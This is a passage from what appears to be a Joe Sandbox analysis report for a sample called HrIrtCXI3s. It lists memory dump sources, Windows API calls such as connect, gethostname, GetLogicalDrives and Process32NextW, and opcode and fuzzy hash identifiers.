                                                      • Opcode ID: 6ae22c71ff80158239a5167ac7d953f22bc8991a4b6a9ecea7fc559ae973bb47
                                                      • Instruction ID: c6b91ee2b6031d4ece28243a6df575264cdded52c48ea37eae824901488370de
                                                      • Opcode Fuzzy Hash: 6ae22c71ff80158239a5167ac7d953f22bc8991a4b6a9ecea7fc559ae973bb47
                                                      • Instruction Fuzzy Hash: B541BFEB13C120BEB26291962B94AFB6BADF5E7730B30C436F407D5502E2E40B8D1171
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.2012236196.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012885900.0000000000BAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000E47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000E50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013313748.0000000000F41000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013508778.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013531411.00000000010FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: closesocket
                                                      • String ID: FD %s:%d sclose(%d)
                                                      • API String ID: 2781271927-3116021458
                                                      • Opcode ID: cd12522a89362346d0c5a71f95b566ebd6f641182769ebd3b9b3b473e206239e
                                                      • Instruction ID: cb1929e9cbb457f7135dc8f27e7855702d96f14f1e950b7434ee6e3deb0ae4ce
                                                      • Opcode Fuzzy Hash: cd12522a89362346d0c5a71f95b566ebd6f641182769ebd3b9b3b473e206239e
                                                      • Instruction Fuzzy Hash: AFD05E32A092213B852069996C58C4B7BA8DEC6F60F460CAAF94077304F1249D0083F2
                                                      APIs
                                                      • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,0059B29E,?,00000000,?,?), ref: 0059B0B9
                                                      • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,00583C41,00000000), ref: 0059B0C1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.2012236196.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012885900.0000000000BAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000E47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000E50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013313748.0000000000F41000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013508778.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013531411.00000000010FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastconnect
                                                      • String ID:
                                                      • API String ID: 374722065-0
                                                      • Opcode ID: ce96786ad1ab3b59b284a3cbec816e29d7eb10181c9aa1775580c855221a0876
                                                      • Instruction ID: 2b7b561801f1d8f76fc3d0f6c14e24306682ddc49511051378a02a7e01e393cf
                                                      • Opcode Fuzzy Hash: ce96786ad1ab3b59b284a3cbec816e29d7eb10181c9aa1775580c855221a0876
                                                      • Instruction Fuzzy Hash: BB01D8322042005BFE205A79AD48F6BBBA9FF89764F140B24F97CA31D1D726DD508752
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016803091.0000000007260000.00000040.00001000.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7260000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3a6d32ea4aa8c0f70233d9f2784dc51aabd5a1aff4c7093469110fea0133d9b9
                                                      • Instruction ID: 709d45345142fae09dc5e20be744ec10ba778ef8c4796d9606e0beed5d91463b
                                                      • Opcode Fuzzy Hash: 3a6d32ea4aa8c0f70233d9f2784dc51aabd5a1aff4c7093469110fea0133d9b9
                                                      • Instruction Fuzzy Hash: BC51C2E757C221BEB22291416F5CEFB676EE6C3730B318467F802D6542E2E54E8A6071
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016803091.0000000007260000.00000040.00001000.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7260000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: NextProcess32
                                                      • String ID:
                                                      • API String ID: 1850201408-0
                                                      • Opcode ID: 6b12606bef91e20664c209574be90d3b69aea370fc8b430a296022f45c833627
                                                      • Instruction ID: b51befff7f2c685a6a92b63e05bf0fc1832517913b553b7df768b0a42c069635
                                                      • Opcode Fuzzy Hash: 6b12606bef91e20664c209574be90d3b69aea370fc8b430a296022f45c833627
                                                      • Instruction Fuzzy Hash: AC51C3F757C251AEB26291416F58EFB676ED6C3730B308427F807D6242E2E50E896071
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016803091.0000000007260000.00000040.00001000.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7260000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: NextProcess32
                                                      • String ID:
                                                      • API String ID: 1850201408-0
                                                      • Opcode ID: 764314848fa67a3f2f6d2e8c7c1dbf55cd60d8759ebde3f62ddb99b099c0121f
                                                      • Instruction ID: d9bce9c82d5c20d0c01cfd27a32c4b28887c7904a4ed4ad64d61aef31089abbf
                                                      • Opcode Fuzzy Hash: 764314848fa67a3f2f6d2e8c7c1dbf55cd60d8759ebde3f62ddb99b099c0121f
                                                      • Instruction Fuzzy Hash: 8141A1E717C221BEB27195426B5CEFB676EE6C3730B308427F807D6641E2E50E896071
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016803091.0000000007260000.00000040.00001000.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7260000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: NextProcess32
                                                      • String ID:
                                                      • API String ID: 1850201408-0
                                                      • Opcode ID: ad68e93106ad25869515e2639985b225e502c0be73d4e23fe8e3945d4079cec1
                                                      • Instruction ID: eeac43fe8bf36602192f838cafbe07f6d26d57d3d86b29bbec786ab91f30cb2a
                                                      • Opcode Fuzzy Hash: ad68e93106ad25869515e2639985b225e502c0be73d4e23fe8e3945d4079cec1
                                                      • Instruction Fuzzy Hash: 07417FE757C221BEB27195426B5CEFB676EE6C3730B308427F807D6641E2E50E896071
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016803091.0000000007260000.00000040.00001000.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7260000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e1b79fc70e32d9dc7b016783767c7c4120415dd4211299f6f0aee5dd95b9476e
                                                      • Instruction ID: b5d66d895dac5a1fdcf238ad546ae177bf154f6745c8d3ad7220e4d687307e59
                                                      • Opcode Fuzzy Hash: e1b79fc70e32d9dc7b016783767c7c4120415dd4211299f6f0aee5dd95b9476e
                                                      • Instruction Fuzzy Hash: 83417DE757C221BEB27191422B58EFB676EE6C3730B308427F807D6541E2E54E8A6071
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016803091.0000000007260000.00000040.00001000.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7260000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: NextProcess32
                                                      • String ID:
                                                      • API String ID: 1850201408-0
                                                      • Opcode ID: 1a74abf0a703e5fab24f0cbb9ef797d5e4aa0d345bf2585ec8e45a049f64ce50
                                                      • Instruction ID: f0d8d8af57bfd8b685519092ebdb03ddf189b9913d0c3aced5206b086d902dca
                                                      • Opcode Fuzzy Hash: 1a74abf0a703e5fab24f0cbb9ef797d5e4aa0d345bf2585ec8e45a049f64ce50
                                                      • Instruction Fuzzy Hash: 03417EE757C221BEB26191426B58EFB676EE6C3730B30842BB806D6541E2E90E896071
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016803091.0000000007260000.00000040.00001000.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7260000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: NextProcess32
                                                      • String ID:
                                                      • API String ID: 1850201408-0
                                                      • Opcode ID: ee0a282a34692ca04803a68053e2bc2091d1d3b882fd7744ffdf65bcdfb0567a
                                                      • Instruction ID: 4277d9afe9ef3dc87d92a617ae7ae54e00d1f145f85a422f88240ee1263059b1
                                                      • Opcode Fuzzy Hash: ee0a282a34692ca04803a68053e2bc2091d1d3b882fd7744ffdf65bcdfb0567a
                                                      • Instruction Fuzzy Hash: C04160E767C221BE726191422F58EFB576EE6C3730B308427B806D6541E2E54E896071
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016803091.0000000007260000.00000040.00001000.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7260000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: NextProcess32
                                                      • String ID:
                                                      • API String ID: 1850201408-0
                                                      • Opcode ID: 2a99b8d34b31357ec7a922e30426af946a002a321b5cd63d78e15d1e61e6ef44
                                                      • Instruction ID: cdea619f002814c008ac2bd92d4519f087eec3edfaa43d190efffdaa15baa4aa
                                                      • Opcode Fuzzy Hash: 2a99b8d34b31357ec7a922e30426af946a002a321b5cd63d78e15d1e61e6ef44
                                                      • Instruction Fuzzy Hash: 6C41B2E767C221BEB22181522B58EFB576EE6C3730B30842BF803D6542E3D50E8A6071
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 072103F5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID:
                                                      • API String ID: 999431828-0
                                                      • Opcode ID: 940540ed3454ac4e72b5bf1793eec7274405c43cb75e94a5fd0643cf738e3616
                                                      • Instruction ID: 589404f62e7e7091566f1fc9be66f48e6a17771af176518f7e3757f211bab9ed
                                                      • Opcode Fuzzy Hash: 940540ed3454ac4e72b5bf1793eec7274405c43cb75e94a5fd0643cf738e3616
                                                      • Instruction Fuzzy Hash: 3F41C2EB13C111BEB222D1962B55AFAABADF6E7730B30C427F447D9502E2D40A8E1171
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016803091.0000000007260000.00000040.00001000.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7260000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5e59f24cd0177b20453bd5e9016f6dc14100a425f0be06e3ea75bb3b341d06f3
                                                      • Instruction ID: eaf545161507c56d90cc9d1d5bf88ae80f5f3d25310b5c9b5d5038e40124882b
                                                      • Opcode Fuzzy Hash: 5e59f24cd0177b20453bd5e9016f6dc14100a425f0be06e3ea75bb3b341d06f3
                                                      • Instruction Fuzzy Hash: 5A4150E757C221BEB17181422F58EFB576EE6C3730B318427F807D6541E2E54E9A6071
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016803091.0000000007260000.00000040.00001000.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7260000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0da1d15bc5373b0c2f5953396225085c5e4f3bca4ac0b80048f52f3c4850eb8b
                                                      • Instruction ID: 8b162329a21a734da1cedacc7d75959d968d5517430c7bc871427c24f6f83925
                                                      • Opcode Fuzzy Hash: 0da1d15bc5373b0c2f5953396225085c5e4f3bca4ac0b80048f52f3c4850eb8b
                                                      • Instruction Fuzzy Hash: 71316FE757C221BEB27181422B58EFB576EE6C3730B318427F807D6641E2E90E996071
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016803091.0000000007260000.00000040.00001000.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7260000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: NextProcess32
                                                      • String ID:
                                                      • API String ID: 1850201408-0
                                                      • Opcode ID: 65634b6a808c18eceec5b6ec202bc079420a6c5f145a96f67af1674761797ce6
                                                      • Instruction ID: 4780b2d44726cabd2d7bb543cfd2a0ed9f78cb0fe29d225e2680944216bf2ba9
                                                      • Opcode Fuzzy Hash: 65634b6a808c18eceec5b6ec202bc079420a6c5f145a96f67af1674761797ce6
                                                      • Instruction Fuzzy Hash: CA317EE757C221BEB27181422B58EFA576EE6C3730B318427B807D6641E3E94E9A6071
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 072103F5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID:
                                                      • API String ID: 999431828-0
                                                      • Opcode ID: c42cd32e9628c91328a6dc78236a2b78bfd5eed236c199d3081dcf759de8e94a
                                                      • Instruction ID: 2a95822d41c18d603a2fb73cf8a5a5cd17ce09618503542ddc9fb7ea22c61586
                                                      • Opcode Fuzzy Hash: c42cd32e9628c91328a6dc78236a2b78bfd5eed236c199d3081dcf759de8e94a
                                                      • Instruction Fuzzy Hash: 7B314AEB138121BDB16291962BA5BFB6BADF5F7730B30C436F807D6506E2D80A8D1131
                                                      APIs
                                                      • gethostname.WS2_32(00000000,00000040), ref: 00584AA4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.2012236196.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012885900.0000000000BAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000E47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000E50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013313748.0000000000F41000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013508778.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013531411.00000000010FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: gethostname
                                                      • String ID:
                                                      • API String ID: 144339138-0
                                                      • Opcode ID: 187d078580df4786b1721f77a3289271c1be4f254aed9083c0dd4c4ce913b29a
                                                      • Instruction ID: cbb8a301dfd92e8952501e0fbfab1372d0487c16ba79a5477c7f4fdef9f86650
                                                      • Opcode Fuzzy Hash: 187d078580df4786b1721f77a3289271c1be4f254aed9083c0dd4c4ce913b29a
                                                      • Instruction Fuzzy Hash: 1551CFB06047028BEB30AB65D9497237EE4BF4131AF04093DED8AAB6D1E775E844CF12
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 072103F5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID:
                                                      • API String ID: 999431828-0
                                                      • Opcode ID: b271c0dc525300dbe016407898d893b94c251ce18a6af4b80f2fd055f038fe13
                                                      • Instruction ID: 074c31289f812f2c0159f65fa5f328f06d0df120206a26d0c00cd5356cb8b6ac
                                                      • Opcode Fuzzy Hash: b271c0dc525300dbe016407898d893b94c251ce18a6af4b80f2fd055f038fe13
                                                      • Instruction Fuzzy Hash: FA314BEB238111BDB16291862B54AFBA7ADF5E7730B30C43BF807D5506E2D80B8D1532
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 072103F5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID:
                                                      • API String ID: 999431828-0
                                                      • Opcode ID: 8ae97e6426428f72857ec295841c91089dd20e99995150429e942d4b7110ea93
                                                      • Instruction ID: 6ac944cb9b720537d4f292c2308f0810d07ea587e9a7364dbfa57072390ba015
                                                      • Opcode Fuzzy Hash: 8ae97e6426428f72857ec295841c91089dd20e99995150429e942d4b7110ea93
                                                      • Instruction Fuzzy Hash: 41314BEB23C111BDB16291962B95BFA67ADF5E7730B30C437F807D5506E2D80A8D1132
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016803091.0000000007260000.00000040.00001000.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7260000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: NextProcess32
                                                      • String ID:
                                                      • API String ID: 1850201408-0
                                                      • Opcode ID: ab1cb28c31160768b5d2c90f91a2bf2942d9d82d7be5fd8f77ed9628ade5da5e
                                                      • Instruction ID: fb098132a34ac7286ebf110fa0c50a613cbfa77a9ff15793eb39259d0935481d
                                                      • Opcode Fuzzy Hash: ab1cb28c31160768b5d2c90f91a2bf2942d9d82d7be5fd8f77ed9628ade5da5e
                                                      • Instruction Fuzzy Hash: 5831A2E757C221AEB23181422B5CEFB566EE6C3730B308427B807D6641E3E90E997071
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016803091.0000000007260000.00000040.00001000.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7260000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d219db7c3a88137bb43b32d82c8faf0b18f361e5e70dc233ab31deee93f55369
                                                      • Instruction ID: ccbd31cbba4487a423b7565a1d7079f6cc41c8ef6953aae3eaf80661c32b9f0c
                                                      • Opcode Fuzzy Hash: d219db7c3a88137bb43b32d82c8faf0b18f361e5e70dc233ab31deee93f55369
                                                      • Instruction Fuzzy Hash: EF316FE757C221AEB27181522B5CEFA676EE6C3730B30842BF806D6541E3D44ADA7071
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016803091.0000000007260000.00000040.00001000.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7260000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2cf8fd50451319d560186d5b6bceac899edb1dce3c72994a8058ebdf77de2db7
                                                      • Instruction ID: a63d90a00721af29429d3d63d940792acb3c0b6b326be497854860e78b778e2d
                                                      • Opcode Fuzzy Hash: 2cf8fd50451319d560186d5b6bceac899edb1dce3c72994a8058ebdf77de2db7
                                                      • Instruction Fuzzy Hash: 5E3138E257C221AFB63285515B9CDF7675EEA83730B30842BF802D7541E3D40ECA60B1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016803091.0000000007260000.00000040.00001000.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7260000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 11e4844ccd64e19566b9c2c7e910aba43f19349a677e989b77da4a1ac453015f
                                                      • Instruction ID: b293ce77fcd07f9b246c0042ef61c14ba0c04afb891ac1921de490abbdaf3546
                                                      • Opcode Fuzzy Hash: 11e4844ccd64e19566b9c2c7e910aba43f19349a677e989b77da4a1ac453015f
                                                      • Instruction Fuzzy Hash: 86315EF757C221AEB27181522B5CEFB665EE6C3730B308427F806D6541D3D40A9A6071
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 072103F5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID:
                                                      • API String ID: 999431828-0
                                                      • Opcode ID: 42fc57b09d55dec5bf6bf8b31d4f2d86f833ff5a90c2578b44a8e7bb198f47b0
                                                      • Instruction ID: 3648aa1eed21a7754da3d4c2bff9c815b4e8a30fc0577110aae470989d1dcbff
                                                      • Opcode Fuzzy Hash: 42fc57b09d55dec5bf6bf8b31d4f2d86f833ff5a90c2578b44a8e7bb198f47b0
                                                      • Instruction Fuzzy Hash: 81216DEB638114BDB16291962B94AFA67ADF6E7730B30C436F407D5506E2D80F8D1131
                                                      APIs
                                                      • Process32FirstW.KERNEL32(30F902FF,30F902FF,30F902FF,000035A0), ref: 0725038A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016783354.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7250000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: FirstProcess32
                                                      • String ID:
                                                      • API String ID: 2623510744-0
                                                      • Opcode ID: 0794ca44ed5f5bbe417f8f469a78672e4917b4f03d67d1cd40437818bace4858
                                                      • Instruction ID: 5da5ccad622c75091120f17a4f1d011ea8aab177de92e6ddb58586ba4da9c480
                                                      • Opcode Fuzzy Hash: 0794ca44ed5f5bbe417f8f469a78672e4917b4f03d67d1cd40437818bace4858
                                                      • Instruction Fuzzy Hash: 4C21D7EB1781117D712290A56F10AFBA67EE5D7770B308436FC07D3642E2F44E4A1031
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016803091.0000000007260000.00000040.00001000.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7260000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: NextProcess32
                                                      • String ID:
                                                      • API String ID: 1850201408-0
                                                      • Opcode ID: 3132a8dbdc3de21c653762f42d08398e56cd22dddddb050275bbf964e6736ee2
                                                      • Instruction ID: 9afb4d837a0f9b61f6320cdb9b847d719aafb94dff2f2900b6a1abf0552b1862
                                                      • Opcode Fuzzy Hash: 3132a8dbdc3de21c653762f42d08398e56cd22dddddb050275bbf964e6736ee2
                                                      • Instruction Fuzzy Hash: 5E21B1E757C121AFB23281526B9CEFB661EEAC3630F30842BF806D6541E2D44EDA6071
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016803091.0000000007260000.00000040.00001000.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7260000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: NextProcess32
                                                      • String ID:
                                                      • API String ID: 1850201408-0
                                                      • Opcode ID: 6841eb5dc0bd2f5c0eadb514c8a93d1b93958e453bd7ee2126228bf837db5ef9
                                                      • Instruction ID: 2a8fdfd0f0ed2a9cce28b425260cb42dfaa18027b048d0ea76d8786365fabed2
                                                      • Opcode Fuzzy Hash: 6841eb5dc0bd2f5c0eadb514c8a93d1b93958e453bd7ee2126228bf837db5ef9
                                                      • Instruction Fuzzy Hash: 852191E657C221AFA23195522B9CDFA665EEA83730F308427F806D6641E3D40E997071
                                                      APIs
                                                      • Process32NextW.KERNEL32(?,?), ref: 072603E0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016803091.0000000007260000.00000040.00001000.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7260000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: NextProcess32
                                                      • String ID:
                                                      • API String ID: 1850201408-0
                                                      • Opcode ID: f38952252914556daed3bdef24dd0c9045fd2bb970bde1c7845dec0e98a9c03b
                                                      • Instruction ID: 213806befb893fb278ff2e4ae3760005f1ed0ff26b844051e78f6e0e5cacfc1c
                                                      • Opcode Fuzzy Hash: f38952252914556daed3bdef24dd0c9045fd2bb970bde1c7845dec0e98a9c03b
                                                      • Instruction Fuzzy Hash: 161127F6978222EFA3319521179C9BA6256BB93231F304427A802D7941E3E44AD53022
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016803091.0000000007260000.00000040.00001000.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
